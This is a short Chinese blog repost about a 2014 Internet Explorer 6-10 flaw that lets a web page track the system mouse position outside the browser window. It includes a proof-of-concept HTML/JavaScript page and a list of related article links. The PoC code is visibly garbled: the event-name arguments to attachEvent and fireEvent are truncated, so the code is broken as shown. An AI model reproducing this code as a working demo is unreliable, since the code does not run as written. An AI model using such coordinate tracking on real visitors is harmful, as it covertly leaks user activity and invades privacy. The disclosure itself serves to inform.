IE浏览器鼠标坐标跟踪安全风险,通杀全版本---IE的最大特色
2014-04-14 19:08
302 查看
刚在Seclist上又看到了IE漏洞。该漏洞的主要影响是能够跟踪鼠标坐标位置,即使当前鼠标位置位于非浏览器窗口。该漏洞最先被spider.io团队发现。影响版本:IE6-10测试:在系统目录下新建一个html文件,代码如下:
<!DOCTYPE html> <html> <head> <meta charset="utf-8" /> <title>Exploit Demo</title> <script type="text/javascript"> window.attachEvent(" function() { var detector = document.getElementById("detector"); detector.attachEvent(" function (e) { detector.innerHTML = e.screenX + ", " + e.screenY; }); setInterval(function () { detector.fireEvent(" }, 100); }); </script> </head> <body> <div id="detector"></div> </body> </html>
用IE打开新建的html文件http://perlin.blog.51cto.com/1202304/1123397
相关文章推荐
- IE浏览器鼠标坐标跟踪安全风险,通杀全版本
- IE6-10浏览器鼠标坐标跟踪安全风险
- 关于在IE下的一个安全BUG --可用于跟踪用户的系统鼠标位置
- IE下的一个安全BUG —— 可实时跟踪系统鼠标位置
- IE下的一个安全BUG —— 可跟踪用户的系统鼠标位置
- 用 javascript 获取鼠标(光标)的坐标位置 兼容IE/Firefox等浏览器
- Windows Server 2003中的IIS 6.0默认设置是特别严格和安全的,最大只能传送 204800个字节,我们需要修改,以允许从IE中上传更大的附件。解决办法是
- 跟踪鼠标在窗口上的坐标
- 获取事件目标对象的位置坐标或者鼠标位置坐标(兼容IE和火狐)
- 简单的鼠标经过图片时变大,IE低版本浏览器不兼容
- js判断是否是ie浏览器且给出ie版本
- 目前最大的IPv6安全风险有哪些?
- IE浏览器故障 打开某些网页时IE弹出安全警告
- IE浏览器版本过低提示:iealert.js
- js判断是否是ie浏览器且给出ie版本
- FF,IE下鼠标坐标 offset client event的区别
- 如何不让IE提示——当前安全设置会使计算机有风险
- 简单的鼠标经过图片时变大,IE低版本浏览器不兼容
- JavaScript基础 event(For IE) 显示鼠标点击处的坐标值 距离窗口的距离 距离网页的距离 距离屏幕的距离